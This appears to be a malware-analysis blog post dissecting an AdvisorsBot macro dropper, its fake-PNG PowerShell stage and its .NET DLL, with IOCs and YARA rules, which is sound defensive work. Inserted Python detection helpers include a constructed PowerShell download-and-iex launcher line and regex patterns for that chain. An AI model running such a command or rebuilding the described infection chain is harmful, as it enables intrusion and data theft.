The return of AdvisorsBot

Introduction

In the past few days, the researchers of Cybaze-Yoroi ZLab analyzed a new, peculiar sample. As usual, the malware arrives as an apparently legitimate e-mail attachment, named “invoice.doc”. Today, weaponized Microsoft Office documents with macros are among the most common and most effective methods to deliver malware, because they also rely on simple social engineering tricks to lure users into enabling them.

The following figure shows the workflow of the infection chain:

Figure 1 – Malware’s workflow

Technical analysis

Hash (SHA-256): a3088d98d46a7202edeafeb744dbd822c647c72ce0d3949f895106ff3e201c9c
Threat: Dropper
Brief: invoice(7).doc
ssdeep: 3072:tg919RZTg8X+H4u7sFYv3Rtf7XZ7PE1MbXEy271G5FZy+1OhV5biqb09H/TrN1Wk:8iqYph1Q5O3

Table 1 – Dropper information

Hash (SHA-256): 62a7423f2ac8d80caa35fc3613b0cc6e01b22a7cb5e898176f4f42c3cf9f20be
Threat: PowerShell script
Brief: okzjtag.png (dropper/payload)
ssdeep: 192:I6P2ZF0tX6vYhscXNtP++l3p2RwPNtOZE9yHPKR4EJxT/7MZUJn7rW0v:I6P+F4ac3aRwP7d9Ic4EJxT/gZEXWq

Table 2 – Fake PNG (PowerShell script) information

Once opened, the document kindly asks the user to enable the macro scripts, which are heavily obfuscated to avoid static detection.

Figure 2 – Document view inviting the user to enable macros

The macro code downloads a text string through a WebClient object invoked from the PowerShell console, saves it with a .png file extension and runs it through the “iex” (Invoke-Expression) primitive.

Figure 3 – Piece of the VBS script that starts the malware infection
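A detection sketch for the chain just described (WebClient download, content saved with an image extension, evaluated with iex), added here as an example and not code from the original post: it scores PowerShell command-line records against the three indicators and flags only the combination of download and evaluation. The records, the 198.51.100.7 address and the regular expressions are constructed assumptions.

```python
import re

# Constructed sample command-line records modelled on the chain described
# in the post (macro -> PowerShell WebClient -> .png -> iex). Not real logs.
SAMPLE_RECORDS = [
    # stage-1 launcher as the macro would start it (constructed)
    "powershell -w hidden -c \"$w=New-Object Net.WebClient;"
    "$d=$w.DownloadString('http://198.51.100.7/okzjtag.png');"
    "Set-Content $env:TEMP\\okzjtag.png $d;iex (Get-Content $env:TEMP\\okzjtag.png)\"",
    # admin script that downloads a file but never evaluates it (benign)
    "powershell -c \"(New-Object Net.WebClient).DownloadFile('https://example.org/tool.zip','C:\\tmp\\tool.zip')\"",
    # iex on a local literal with no download (low signal on its own)
    "powershell -c \"iex 'Get-Date'\"",
]

# Each indicator maps to one link of the chain described in the post.
INDICATORS = {
    "webclient_download": re.compile(r"Net\.WebClient.*?\.Download(String|Data|File)", re.I | re.S),
    "script_as_image": re.compile(r"\.(png|jpg|gif)\b", re.I),
    "invoke_expression": re.compile(r"(?<![\w-])(iex|Invoke-Expression)(?![\w-])", re.I),
}


def match_indicators(record):
    """Return the set of indicator names that fire on one record."""
    return {name for name, rx in INDICATORS.items() if rx.search(record)}


def is_advisorsbot_like(record):
    """Alert only when remote content is both downloaded and evaluated."""
    hits = match_indicators(record)
    return "webclient_download" in hits and "invoke_expression" in hits


def triage(records):
    """(record prefix, sorted indicators, alert) for every record."""
    return [(r[:40], sorted(match_indicators(r)), is_advisorsbot_like(r)) for r in records]
```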

This script contains several base64-encoded chunks of data, as shown in the following figure.

Figure 4 – Piece of base64-encoded code inside the fake PNG image

Decoding the first chunk reveals the IP address of the C2, which is the same address used to download the whole script.

Figure 5 – Deobfuscated C2 IP address

The second chunk, stored in the variable “$jdH9C”, is a Gzip-compressed stream (inflated through a GzipStream object). After decoding it, we noticed that an executable file is stored within the memory stream:

Figure 6 – DLL hardcoded inside the fake PNG script

The analysis of this binary is reported in the next section (see “DLL Analysis”).
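The following Python triage helper is an added example (not code from the post or from the malware): it pulls base64 literals out of a script shaped like the fake PNG described above (Figures 4 to 6), decodes each one, unwraps the Gzip-compressed chunk and labels what is inside, skipping identifiers that merely look like base64. The script text is constructed: the first chunk decodes to the C2 address stated on the page, the “$jdH9C” chunk wraps a fake MZ stub instead of the real DLL, and the variable names other than those are assumptions.

```python
import base64
import binascii
import gzip
import re

# Constructed stand-in for the downloaded fake "okzjtag.png" script. The
# "DLL" is a fake MZ stub, not the real payload.
FAKE_DLL = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 26
SAMPLE_SCRIPT = (
    '$c2 = "' + base64.b64encode(b"162.244.32.180").decode() + '"\n'
    '$jdH9C = "' + base64.b64encode(gzip.compress(FAKE_DLL)).decode() + '"\n'
    '$stage3 = "' + base64.b64encode(b"$x = nvtTvqn; iex $x").decode() + '"\n'
    '$tag = "oiiTPUErt"\n'  # base64 alphabet only, but not valid base64
)

# A string literal made of base64 alphabet characters assigned to a variable.
B64_LITERAL = re.compile(r'\$(\w+)\s*=\s*"([A-Za-z0-9+/]{8,}={0,2})"')
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def classify(blob):
    """Label a decoded chunk: gzip-wrapped content, bare PE, ASCII text or unknown."""
    if blob[:2] == b"\x1f\x8b":  # gzip magic: the GzipStream case ($jdH9C)
        inner = gzip.decompress(blob)
        return ("gzip+" + classify(inner)[0], inner)
    if blob[:2] == b"MZ":  # PE image (the embedded DLL)
        return ("pe", blob)
    try:
        return ("text", blob.decode("ascii"))
    except UnicodeDecodeError:
        return ("unknown", blob)


def extract_chunks(script):
    """Map each base64 variable in the script to (kind, decoded payload)."""
    chunks = {}
    for name, literal in B64_LITERAL.findall(script):
        try:
            chunks[name] = classify(base64.b64decode(literal, validate=True))
        except binascii.Error:  # wrong length or padding: not real base64
            continue
    return chunks


def find_c2(chunks):
    """Text chunks that decode to a bare IPv4 address, as the first chunk does."""
    return [payload for kind, payload in chunks.values()
            if kind == "text" and IPV4.match(payload)]
```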

The last base64 chunk is directly executed through the “iex” primitive. Interestingly, it calls some “non-library” functions, i.e. functions loaded from the previously mentioned DLL file.

Within this script, we noticed a routine named “nvtTvqn” that gathers information about the victim machine.

Figure 7 – System information stolen by the malware

It retrieves:

  1. System Info;
  2. Computer IP address;
  3. Network status;
  4. List of running processes;
  5. Available privileges;
  6. Usernames;
  7. Domain Admins;
  8. Files on the desktop;
  9. Antivirus products installed on the computer.

Another interesting function is “j2aYhH”:

Figure 8 – Account and e-mail stealing

This function searches for all e-mail accounts registered on the victim machine. Its code references another routine, named “CR1Z”, which checks whether the Outlook client is installed.

Figure 9 – Registry key searched by the malware

DLL Analysis

As described in the previous section, the PowerShell script uses functions exported by the executable.

Hash (SHA-256): 5bed1e16ec8177c92265ccfaf29666ed29b3f65f17d040a4ff356e70551d3ef0
Threat: Malware payload containing some malicious functions invoked by the PowerShell script
Brief: *.dll file (payload)
ssdeep: 96:+8irQu26Iu2X/lZxvXZ31n2G1QmAPuvEHNeSPKw+1sxXt/WxJtMkQRO7j+gqT:+PRoViGOmFvEHNeSCp1sxdumkQbl

Table 3 – DLL information

The file is a dynamic-link library not yet known to major security platforms.

Figure 10 – DLL results on VirusTotal

The library embeds MSIL code running on top of the .NET framework, so it is quite straightforward to recover its source code.

Figure 11 – Static analysis on DLL

The extracted code contains utility functions used for many purposes, for instance to generate a pseudo-random installation path.

Figure 12 – Source code of a function in the DLL

The “kaYchi” function, instead, accepts three parameters (id, status and post) and creates files with two different extensions: “*.asp” if the “post” variable is true and “*.jpg” otherwise.

Figure 13 – Function generating the .asp or .jpg file used to write/send victim information to the C2

The remote command and control server (162.244.32.180) was down at the time of writing. After the steps described above, the malware tries to download other components from it and execute them with the “iex” primitive.

The last DNS activity was in December 2018. This IP is already known to the research community and labeled as malicious. The IP is located in the US, as visible in the following figures.

Figure 14 – Previous DNS records of the C2

Figure 15 – C2 relation graph

The domain zosmogroel.com was active until 18-12-2018; we also found an associated certificate with the SHA-1 fingerprint 98b637715fa6429a60eed9b58447e967bf7e1018.

Figure 16 – zosmogroel.com certificate

This fingerprint was associated with more than 80 IP addresses; further analysis revealed that some of them have been used as drop URLs for other malware samples.

The analyzed sample is AdvisorsBot, first analyzed by Proofpoint on 23 August 2018. We also found evidence on a public sandbox that, last August, the remote C2 162.244.32.180 delivered a Ursnif/Gozi variant (162.244.32.180/yak0810.exe) with the following SHA-256: 030531a784f72f145bef98a3240283da88fe623904c066be179fbbe3a9150c48, as also confirmed by signatures on VirusTotal. This last piece of evidence suggests that this infrastructure may have been used to deliver different malware families.

Conclusions

Weaponized Microsoft Office documents delivered via e-mail represent the top infection vector in today's malware landscape; in second place we find the abuse of the Microsoft DDE protocol together with CVE-2017-11882. One reason is that, very often, macro malware does not rely on expensive-to-deploy 0-day exploits and can bypass endpoint security solutions (macros are often whitelisted in enterprise environments) thanks to the extensive use of multi-layered obfuscation, mainly in PowerShell; broadly speaking, it has a very low barrier to entry.

Several APT groups today use spear-phishing e-mails with a weaponized Office document as an attachment. Just to name a few: the OilRig APT used BondUpdater in a campaign discovered by FireEye in 2017, targeting a different Middle Eastern governmental organization with a malicious VBA macro that downloads a two-stage PowerShell payload.

A similar vector was used in a recent APT28 campaign targeting individuals with a specific interest in the CyCon US cybersecurity conference organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE). The attackers did not use any zero-day vulnerability in this campaign; instead, they relied on weaponized Office documents containing VBA scripts used to deliver a new variant of Seduploader. The Turla APT also used weaponized documents in its recent campaigns to deliver KopiLuwak with a heavily obfuscated JavaScript payload.

This sample shows a high level of obfuscation to defeat AV and does not use any exploit; in fact, the obfuscated DLL component was not flagged by VirusTotal (0/60) at the time of writing. Unfortunately we cannot carry on the analysis because the C2 is no longer reachable, but we noticed that the last DNS activity was in December 2018, with the registration of 2 distinct domains active for 1 week each (and several domains before them). This suggests that the malware was developed to be used in target-specific activities, tightening the time window to a minimum each time. Further analysis of these registered domains suggests that the whole infrastructure is quite large (88 IPs found) and that it may also have been used to deliver other malware.

Researchers of Cybaze-Yoroi ZLab advise disabling macros by default and carefully checking the origin of e-mails.

Indicators of Compromise

  • Dropsite:
    • 162.244.32[.180
  • C2:
    • 162.244.32[.180
  • Hash:
    • a3088d98d46a7202edeafeb744dbd822c647c72ce0d3949f895106ff3e201c9c
    • 62a7423f2ac8d80caa35fc3613b0cc6e01b22a7cb5e898176f4f42c3cf9f20be
    • 5bed1e16ec8177c92265ccfaf29666ed29b3f65f17d040a4ff356e70551d3ef0

Yara rules

rule ps_dropper_29_01_2019
{
    meta:
        description = "Yara Rule for ps_dropper"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019_01_29"
        tlp = "white"
        category = "informational"

    strings:
        $a = "nubiunddd"                    // ASCII string present in the dropper document
        $b = {40 03 92 DA 05 60 CE 13 38}   // byte sequence taken from the dropper
        $c = {81 42 2A 08 43 4A 1C 00}      // byte sequence taken from the dropper
        $d = {D0 CF}                        // start of the OLE Compound File magic (D0 CF 11 E0)

    condition:
        all of them
}


rule extracted_dll_29_01_2019
{
    meta:
        description = "Yara Rule for extracted_dll"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019_01_29"
        tlp = "white"
        category = "informational"

    strings:
        $a = {4D 5A}                                          // "MZ" PE header
        $b = {61 00 73 00 70 00 00 09 2E 00 6A 00 70 00 67}   // UTF-16LE "asp" followed by ".jpg" in the .NET user-string heap (extensions used by kaYchi)
        $c = "tools.dll"                                      // module name embedded in the DLL
        $d = {54 43 77 77 00 6A 79 35}                        // byte sequence taken from the DLL

    condition:
        all of them
}

rule image_script_29_01_2019
{
    meta:
        description = "Yara Rule for image_script"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019_01_29"
        tlp = "white"
        category = "informational"

    strings:
        $a = "MTYyLjI0NC4zMi4xODA="   // base64 of "162.244.32.180", the C2 address
        $b = "oiiTPUErt"              // identifier used in the script
        $c = "iQ2xpZW50KSVc"          // base64 fragment from the script body
        $d = "$sIS8cqNJ13x"           // variable name used in the script

    condition:
        // "and" binds tighter than "or"; the parentheses make the intended grouping explicit
        $a or $d or ($b and $c)
}

This blog post was authored by Davide Testa, Luigi Martire, Antonio Farina and Antonio Pirozzi of Cybaze-Yoroi Z-LAB